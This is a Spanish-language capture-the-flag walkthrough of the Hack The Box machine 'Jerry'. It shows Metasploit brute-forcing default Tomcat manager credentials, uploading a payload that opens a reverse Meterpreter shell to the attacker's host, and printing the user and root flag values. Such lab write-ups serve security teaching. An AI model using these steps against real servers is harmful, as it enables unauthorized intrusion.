Hoy vamos a hackear la maquina de HTB llamada Jerry.
Esta catalogada como facil.
Enumeration
sml@m0nikE:~/ctf/htb/machines/jerry$ sudo nmap -A -p- -sS 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 21:04 CET
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1
open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows
Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2
(91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1
(86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows
Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows
Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or
Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 41.26 ms 10.10.14.1
2 43.46 ms 10.10.10.95
OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.82 seconds
Vemos que usa Apache Tomcat asi que vamos a usar metasploit para ver si podemos
hacer bruteforce y obtener los credenciales. Para ello usamos el modulo de
auxiliary/scanner/http/tomcat_mgr_login y usamos como diccionario
el que viene por defecto.
Bruteforce Tomcat
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting
Required Description
---- ---------------
-------- -----------
BLANK_PASSWORDS false
no Try blank passwords for all users
BRUTEFORCE_SPEED 5
yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false
no Try each user/password couple stored in the
current database
DB_ALL_PASS false
no Add all passwords in the current database to the
list
DB_ALL_USERS false
no Add all users in the current database to the list
PASSWORD
no The HTTP password to specify for authentication
PASS_FILE
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
no File containing passwords, one per line
Proxies
no A proxy chain of format
type:host:port[,type:host:port][...]
RHOSTS
yes The target host(s), range CIDR identifier, or
hosts file with syntax 'file:'
RPORT 8080
yes The target port (TCP)
SSL false
no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false
yes Stop guessing when a credential works for a host
TARGETURI /manager/html
yes URI for Manager login. Default is /manager/html
THREADS 1
yes The number of concurrent threads (max one per
host)
USERNAME
no The HTTP username to specify for authentication
USERPASS_FILE
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
no File containing users and passwords separated by space, one pair per
line
USER_AS_PASS false
no Try the username as the password for all users
USER_FILE
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
no File containing users, one per line
VERBOSE true
yes Whether to print output for all attempts
VHOST
no HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
[-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Obtenemos los credenciales:
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
Con los credenciales podemos usar el exploit
exploit/multi/http/tomcat_mgr_upload para ver si podemos
conseguir una shell.
Exploitation
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use
exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified
username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format
type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR
identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing
connections
TARGETURI /manager yes The URI path of the manager app
(/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Java Universal
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret
httppassword => s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 10.10.14.29:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying Si6Mp3gsdJ...
[*] Executing Si6Mp3gsdJ...
[*] Undeploying Si6Mp3gsdJ ...
[*] Sending stage (53906 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.29:4444 -> 10.10.10.95:49192) at
2019-12-05 21:07:31 +0100
meterpreter >
meterpreter > getuid
Server username: JERRY$
Bien, tenemos una shell.
Vamos a ver que privilegios tenemos y obtener los flags.
user.txt and root.txt
meterpreter > shell
Process 2 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\
06/19/2018 03:07 AM apache-tomcat-7.0.88
08/22/2013 05:52 PM PerfLogs
06/19/2018 05:42 PM Program Files
06/19/2018 05:42 PM Program Files (x86)
06/18/2018 10:31 PM Users
06/19/2018 05:54 PM Windows
0 File(s) 0 bytes
6 Dir(s) 27,631,341,568 bytes free
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users
06/18/2018 10:31 PM .
06/18/2018 10:31 PM ..
06/18/2018 10:31 PM Administrator
08/22/2013 05:39 PM Public
0 File(s) 0 bytes
4 Dir(s) 27,631,341,568 bytes free
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop
06/19/2018 06:09 AM .
06/19/2018 06:09 AM ..
06/19/2018 06:09 AM flags
0 File(s) 0 bytes
3 Dir(s) 27,631,341,568 bytes free
C:\Users\Administrator\Desktop>cd flags
cd flags
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM .
06/19/2018 06:09 AM ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,631,271,936 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>
End
Y con esto ya tendriamos el flag del "user" y el flag de "root".